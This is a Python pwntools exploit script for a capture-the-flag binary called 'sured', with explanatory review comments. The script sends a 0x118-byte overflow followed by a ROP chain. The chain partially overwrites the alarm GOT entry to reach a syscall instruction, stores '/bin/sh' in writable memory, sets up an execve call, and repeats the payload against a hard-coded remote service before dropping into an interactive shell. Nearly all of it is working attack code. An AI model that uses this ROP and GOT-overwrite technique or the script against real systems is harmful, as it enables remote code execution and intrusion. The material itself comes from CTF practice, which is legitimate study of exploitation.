CODE GRAY CTF sured
#!/usr/bin/env python
from pwn import *
# pwntools session defaults: open gdb in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']  # horizontal split window
# libc = ELF('./libc.so.6')
# The challenge binary; its architecture drives p64()/asm() below.
elf = ELF('./23016_sured')
context.os = 'linux'
context.arch = elf.arch
# context(log_level='debug') # output verbose log
# Remote CTF service vs. a local copy of the same service (same port).
RHOST, RPORT = "13.112.146.72", 20004
LHOST, LPORT = "127.0.0.1", 20004
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of ELF section *name*.

    *elf* defaults to the challenge binary loaded at module level.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log ``<expr>: 0x<value>`` for the expression string *ss*.

    NOTE: *ss* is passed to ``eval`` in this module's scope, so only ever
    hand it names/expressions written in this script (e.g. ``'pop_rdi'``),
    never anything received from the target.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
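# Pick the target from the first CLI argument (consumed so the remaining
# argv is left untouched for pwntools):
#   r -> remote service, l -> local copy of the service on LPORT,
#   d -> run under gdb with the script below, a -> local process + gdb attach,
#   anything else / no argument -> plain local process.
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
# Tuple membership instead of the substring test `opt in 'rl'`: that form
# also accepted '' and 'rl', which then raised KeyError on the dict lookup.
if opt in ('r', 'l'):
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # Break at a hard-coded address, then continue. The template's
    # `.format(main-or-entrypoint)` call was dropped: the script text has
    # no `{}` placeholder, so the call never changed it.
    gdbscript = """
b *0x4013fd
continue
"""
    conn = gdb.debug(['./23016_sured'], gdbscript=gdbscript)
else:
    conn = process(['./23016_sured'])
    # conn = process(['./23016_sured'], env={'LD_PRELOAD': './libc.so.6'})
    if opt == 'a':
        gdb.attach(conn)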
# exploit
# ---------------------------------------------------------------------------
# ROP chain. Every address below is absolute (0x40xxxx code, 0x605xxx data),
# so the chain only works when the binary is mapped at a fixed base (no PIE).
# The gadget dump below is the author's; `pop_rbp` (0x401200) is not in it.
# NOTE(review): `rop = ''` and the 'x'*8 fillers are str, and pwntools'
# p64() returns bytes on Python 3, so this script runs under Python 2 only.
# ---------------------------------------------------------------------------
log.info('Pwning')
# 0x00402c83: pop rdi ; ret ; (1 found)
# 0x00402c81: pop rsi ; pop r15 ; ret ; (1 found)
# 0x004022a0: pop rsi ; pop rbp ; ret ; (1 found)
# 0x00402c7d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret ; (1 found)
# 0x00402566: mov qword [rbp-0x08], rdi ; nop ; pop rbp ; ret ; (1 found)
# 0x0040255c: mov rax, qword [rbp-0x08] ; pop rbp ; ret ; (1 found)
# 0x004025c4: mov edx, dword [rbp-0x18] ; mov qword [rax+0x08], rdx ; nop ; pop rbp ; ret ; (1 found)
pop_rdi = 0x00402c83
pop_rsi_r15 = 0x00402c81
pop_rbp = 0x00401200
mov_rbp = 0x00402566  # store primitive: [rbp-8] = rdi
rax_set = 0x0040255c  # rax = [rbp-8]
set_edx = 0x004025c4  # edx = [rbp-0x18]; side effect: [rax+8] = rdx
rop = ''
# Each "pop rbp / pop rdi / mov_rbp" triple stores one qword at rbp-8; the
# trailing value (0xdeadbeef etc.) only feeds the gadget's own `pop rbp`.
# overwrite got of alarm to call syscall instruction
# The store goes to 0x6050e9 (unaligned); the only non-zero byte of the
# value, 0x05, lands at 0x6050f0 -- a one-byte partial overwrite of the GOT
# slot the comment refers to. Full RELRO makes the GOT read-only and would
# block this step.
rop += p64(pop_rbp) + p64(0x0000000006050e9+8) + p64(pop_rdi) + p64(0x0500000000000000) + p64(mov_rbp) + p64(0xdeadbeef)
# write "/bin/sh" to writable memory
# 0x68732f6e69622f is "/bin/sh\0" in little-endian order, stored at 0x605f00.
rop += p64(pop_rbp) + p64(0x000000000605f00+8) + p64(pop_rdi) + p64(0x68732f6e69622f) + p64(mov_rbp) + p64(0xdeadbeef)
# for set edx = 0
# Store the pointer 0x605f08 at 0x605f10 and load it into rax, so that the
# set_edx gadget's [rax+8] write hits the scratch slot 0x605f10 itself.
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(0x000000000605f00+8) + p64(mov_rbp) + p64(0xdeadbeef)
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8  # 'x'*8 feeds rax_set's pop rbp
# edx = 0
# Reads the dword at 0x605630; presumably zero at that point -- nothing in
# this gist establishes that.
rop += p64(pop_rbp) + p64(0x605630+0x18) + p64(set_edx) + 'x'*8
# write 59 (execve syscall number) to writable memory
# Stored at 0x605f10; 0x605430 + 0x18 is just the filler for mov_rbp's pop rbp.
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(59) + p64(mov_rbp) + p64(0x605430 + 0x18)
# rax = 59
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8
# rdi = &"/bin/sh", rsi = 0
rop += p64(pop_rdi) + p64(0x000000000605f00) + p64(pop_rsi_r15) + p64(0x00)*2
# call alarm@plt
rop += p64(0x401160)
# 0x118 bytes of filler before the chain (the author's offset; not derivable
# from this gist).
payload = 'x'*0x118 + rop
# attempt race condition: resend the same three lines 100 times
for i in range(100):
    conn.sendline('1')
    conn.sendline(payload)
    conn.sendline('LEAVE')
conn.interactive()